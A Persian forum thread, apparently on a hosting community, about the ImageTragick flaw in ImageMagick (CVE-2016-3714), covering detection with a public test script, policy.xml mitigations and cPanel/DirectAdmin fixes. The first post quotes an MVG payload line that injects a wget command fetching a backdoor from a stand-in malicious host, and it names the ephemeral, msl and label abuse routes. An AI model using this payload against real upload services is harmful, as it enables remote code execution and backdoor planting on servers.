1 فایل پیوست
****مهم و حیاتی آسیب پذیری جدید و حیاتی در ImageMagick*****
imagemagick یکی از نرم افزارهای عمومی است که برای convert کردن و یا ویرایش کردن عکس ها استفاده می گردد.این نرم افزار برای همه زبان های برنامه نویسی عمومی مانند PHP , Python , Rbuy و دیگر زبان های برنامه نویسی عمومی دارای کتابخانه می باشد .
imagetragick
مشکل امنیتی imagemagick کجاست ؟
آخرین ورژن از imagemagick بدرستی قادر به ***** کردن نام فایل ها را ندارد و لذا همین موضوع باعث می گردد که نفوذگران از راه دور بتوانند دستورات خود را اجرا کنند. که این سناریو با آپلود یک عکس از طریق آپلودر هایی که از imagemagick استفاده می گردد اتفاق می افتد که شرح این سناریو در ادامه ذکر شده است.
این آسیب پذیری توسط محققان امنیتی با نام جالب Image Tragick نامگذاری شده است و هم اکنون CVE-2016-3714 متعلق به این آسیب پذیری می باشد.
فایل پیوست 31237
جزئیات مشکل امنینی ImageMagick :
آسیب پذیری در این نرم افزار زمانی رخ می دهد که شما آپلودری داشته باشید که از ImageMagick در آن استفاده می گردد.
که در این حالت زمان آپلود فایل نفوذ گران فایل با پسوند mvg/.svg آپلود می کنند که داخل این فایل ها محتویات مخرب خود را جایگزین می کنند که به عنوان مثال محتویات زیر را در فایل مربوطه قرار می دهند.
image Over 0,0 1,1 'url(https:";wget "http://maliciousurl.com/backdoor.pl" -O /home/vhosts/file/backdoor.pl")'
که در این حالت نفوذگر یک فایل مخرب را از آدرس مشخصی دانلود می کند و در مسیر مشخصی در سرور ذخیره می کند.
حالت های مختلفی برای استفاده از این آسیب پذیری وجود دارد که به عنوان مثال چند حالت سوء استفاده به شرح ذیل می باشد.
1- نفوذ گران براحتی می توانند با استفاده از پروتکل ephemeral:/ فایل هایی را از سرور شما از راه دور حذف کنند.
2- نفوذ گران براحتی می توانند با استفاده از پروتکل msl:/ فایل هایی را از سرور شما را از راه دور جابجا کنند.
3- نفوذ گران براحتی می توانند با استفاده از پروتکل label:@ برای مشاهده محتویات فایل های شما استفاده کنند و سپس محتویات فایل های شما را افشا کنند
زمانی که همه ی این سناریوها در یک حمله رخ دهد. زیانهای جبران ناپذیری را متوجه مدیران سایت ها و مدیران سرور ها می کند
*** نکته : ***** کردن MGV extension به تنهایی برای جلوگیری از این حملات کافی نیست.
به نظر میرسد که محققان امنیتی بزودی اسیب پذیری های جدیدی به همراه سناریو های مختلف حمله برای imagemagick شناسایی و ارائه کنند.
توجه به این نکته الزامی است که بدانید تاکنون IDS ها و فایروال های تحت وب مانند ModSecurity هنوز برای جلوگیری از این حمله راهکاری ارائه نداده اند . و در صورتی که میخواید از این حملات در امان باشید می توانید از فایروال تحت وب سکیورهاست استفاده نمایید.
آیا سرور من در مقابل این حمله آسیب پذیر است ؟
برای این آسیب پذیری سایتی با نام https://imagetragick.com برای این منظور ایجاد شده است که می توانید با استفاده از این سایت آسیب پذیر بودن سرور خود را در مقابل این آسیب پذیری بررسی کنید.
همچنین می توانید دستورات ذیل رو در سرور خود اجرا کنید
git clone https://github.com/ImageTragick/PoCs.git
cd PoCs
./test.sh
در صورتی که سرور شما در مقابل این آسیب پذیری امن باشد . خروجی آن مانند خروجی ذیل می شود.
secure@host:~/code/PoCs$ ./test.sh
testing read
SAFE
testing delete
SAFE
testing http with local port: 38663
SAFE
testing http with nonce: a7DyBeV7
SAFE
testing rce1
SAFE
testing rce2
SAFE
testing MSL
SAFE
و در صورتی که سرور شما دارای نسخه آسیب پذیر ImageMagick باشد خوجی آن شبیه خروجی ذیل می باشد.
secure@host:~/code/PoCs$ ./test.sh
testing read
UNSAFE
testing delete
UNSAFE
testing http with local port: 44755
UNSAFE
testing http with nonce: a7DvBer2
UNSAFE
testing rce1
UNSAFE
testing rce2
UNSAFE
testing MSL
UNSAFE
برای ایمن بودن در مقابل این آسیب پذیری 2 راه دارید.
1- استفاده از WAF اختصاصی سکیورهاست
2- تغییر فایل policy.xml در ImageMagick
برای تغییر فایل مربوطه فایل policy.xml را از مسیر /etc/ImageMagick/policy.xml ویرایش کنید و عبارت ذیل را در آن قرار دهید.
<policymap>
...
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
</policymap>"
به جهت مهم بودن این آسیب پذیری و جلوگیری از نفود هکرها پیشنهاد می گردد در صورتی که می خواهید در سریع ترین زمان این مشکل برطرف گردد تیکتی به بخش امنیت سکیورهاست ارسال نمایید تا سریعا مشکل رابرطرف نمایند.
منبع :
مشکل امنیتی حاد و بحرانی در ImageMagick
پاسخ : ****مهم و حیاتی آسیب پذیری جدید و حیاتی در ImageMagick*****
با سلام و تشکر از شما .
ایمیل آپدیت این مورد دو روز پیش به کاربران سی پنل ارسال شده است .
در مورد سی پنل کافیست دستورات زیر وارد شود:
کد:
/scripts/upcp
/scripts/check_cpanel_rpms --fix --long-list
سپس دستور زیر وارد شود:
کد:
rpm -q --changelog cpanel-ImageMagick | grep CVE-2016-3714
اگر خروجی دستور فوق مطابق متن زیر باشد یعنی مشکل حل شده است:
- - - Apply workaround for CVE-2016-3714
پاسخ : ****مهم و حیاتی آسیب پذیری جدید و حیاتی در ImageMagick*****
با تشکر از استارتر، البته مقداری آپدیت داشته است:
کد:
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
<policy domain="coder" rights="none" pattern="TEXT" />
<policy domain="coder" rights="none" pattern="SHOW" />
<policy domain="coder" rights="none" pattern="WIN" />
<policy domain="coder" rights="none" pattern="PLT" />
پاسخ : ****مهم و حیاتی آسیب پذیری جدید و حیاتی در ImageMagick*****
لطفا روش حل مشکل برای دایرکت آدمین رو هم بفرمایید؟
پاسخ : ****مهم و حیاتی آسیب پذیری جدید و حیاتی در ImageMagick*****
نقل قول:
نوشته اصلی توسط
Kian
لطفا روش حل مشکل برای دایرکت آدمین رو هم بفرمایید؟
در دایرکت ادمین به صورت پیشفرض نصب نیست... نتیجه تست زیر رو قرار بدید:
کد:
git clone https://github.com/ImageTragick/PoCs.git
cd PoCs
./test.sh
پاسخ : ****مهم و حیاتی آسیب پذیری جدید و حیاتی در ImageMagick*****
نقل قول:
نوشته اصلی توسط
Kian
لطفا روش حل مشکل برای دایرکت آدمین رو هم بفرمایید؟
برطرف کردن روی دایرکت ادمین بستگی دارد که شما از چه روشی ImageMagick رو نصب کرده اید.
برای حل مشکل ابتدا دستور زیر را وارد نمایید.
rpm -qa | grep -i image
و خروجی مانند زیر است .
ImageMagick-devel-6.9.3-10.x86_64
بهترین روش دانلود آخرین نسخه از ImageMagick از سایتش و کامپایل دوباره آن است . که می توانید از سایت http://www.imagemagick.org/ دستورالعمل و آخرین نسخه را دریافت نمایید.
بر روی یکی از سرور های دایرکت ادمین این کار رو انجام داده ایم و در نهایت خروجی دستور rpm -qa | grep -i image باید عبارت زیر باشدد
ImageMagick-devel-7.0.1-1.x86_64
باتشکر
پاسخ : ****مهم و حیاتی آسیب پذیری جدید و حیاتی در ImageMagick*****
نقل قول:
نوشته اصلی توسط
Yas-Host
با سلام و تشکر از شما .
ایمیل آپدیت این مورد دو روز پیش به کاربران سی پنل ارسال شده است .
در مورد سی پنل کافیست دستورات زیر وارد شود:
کد:
/scripts/upcp
/scripts/check_cpanel_rpms --fix --long-list
سپس دستور زیر وارد شود:
کد:
rpm -q --changelog cpanel-ImageMagick | grep CVE-2016-3714
اگر خروجی دستور فوق مطابق متن زیر باشد یعنی مشکل حل شده است:
- - - Apply workaround for CVE-2016-3714
مثل اینکه کامل حل نشده !! من تست کردم . نتیجه این شد :
testing read
UNSAFE
testing delete
UNSAFE
testing http with local port: 1234
SAFE
testing http with nonce: xxxxx
SAFE
testing rce1
UNSAFE
testing rce2
UNSAFE
testing MSL
UNSAFE
اما روش پست اول همه رو SAFE میزنه .
